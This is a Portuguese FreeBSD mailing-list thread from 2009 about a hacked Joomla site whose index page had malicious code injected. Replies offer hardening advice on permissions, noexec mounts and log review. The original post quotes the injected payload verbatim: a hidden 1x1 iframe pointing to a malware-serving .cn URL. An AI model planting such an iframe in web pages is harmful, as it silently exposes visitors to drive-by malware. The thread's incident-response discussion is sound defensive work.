Olá Marcello! Já tive um problema parecido... imaginei que tivesse sido esse o problema (permissão), troquei e parou.
Como simular o problema? Como fazer upload via http (sem ser via formulário html) de um arquivo em um diretório do apache em que o usuário do processo (www) tenha direitos de gravação ? Abraço, Eduardo. -------------------------------------------------- From: "Marcello" <[email protected]> Sent: Tuesday, January 13, 2009 3:27 PM To: "Lista Brasileira deDiscussãosobre FreeBSD (FUG-BR)" <[email protected]> Subject: Re: [FUG-BR] [off-topic] Index modificado > O causa mais provavel devem ser o dono do arquivo e permissão de > gravação , o log do apache pode te fornecer algumas dicas de quando isso > ocorreu. > > Verifique se dono do arquivo for www:www , deixe root:www, mas o melhor > seria um grupo joomla ou um usuario qualquer diferente do apache. > > Colocar a pasta publica do apache em uma partição montada com noexec e > nosuid é um excelente modo de evitar supresas. > > Agora isso é furo da aplicação , do joomla que permitiu o uso de algum > script . > > Abraços > > Em Ter, 2009-01-13 às 14:21 -0400, Siclal Oliveira escreveu: >> Olá lista >> >> Esta é minha primeira participação na lista. >> Já trabalho há algum tempo com Freebsd, de forma que espero poder >> contribuir de alguma forma. >> >> Bem, estou com um problema em um dos servidores que administro: >> O servidor roda Freebsd 7.0 release Amd64, com as últimas versões do >> php e do mysql atualizados. >> Ocorre que o meu cliente usa Joomla e algumas das funções exigiram que >> eu desabilitasse o safe mode do php. >> A atualização do Joomla ficaria por conta dele, mas para a minha >> surpresa, atualmente está utilizando a versão 1.0.15, quando a mais >> atualizada seria a 1.5.9. >> Fui chamado porque ao abrir a página era startado um direcionamento a >> uma página com vírus. >> Verificando o index, percebi que havia sido inserido um código >> malicioso não última linha: >> >> <html><body><iframe src="http://litedownloadseek.cn/in.cgi?cocacola8"; >> width=1 >> height=1 style="visibility: hidden"></iframe></body></html> >> >> Eu imagino que a insersão deva ter ocorrido a partir de alguma falha >> do joomla, mas gostaria de saber como proceder com os logs a fim de >> identificar este incidente. >> Como eu poderia saber se o meu servidor foi afetado gravemente. >> >> Desde já agradeço. >> >> Abraços a todos. >> >> Siclal >> ------------------------- >> Histórico: http://www.fug.com.br/historico/html/freebsd/ >> Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd > > ------------------------- > Histórico: http://www.fug.com.br/historico/html/freebsd/ > Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd ------------------------- Histórico: http://www.fug.com.br/historico/html/freebsd/ Sair da lista: https://www.fug.com.br/mailman/listinfo/freebsd
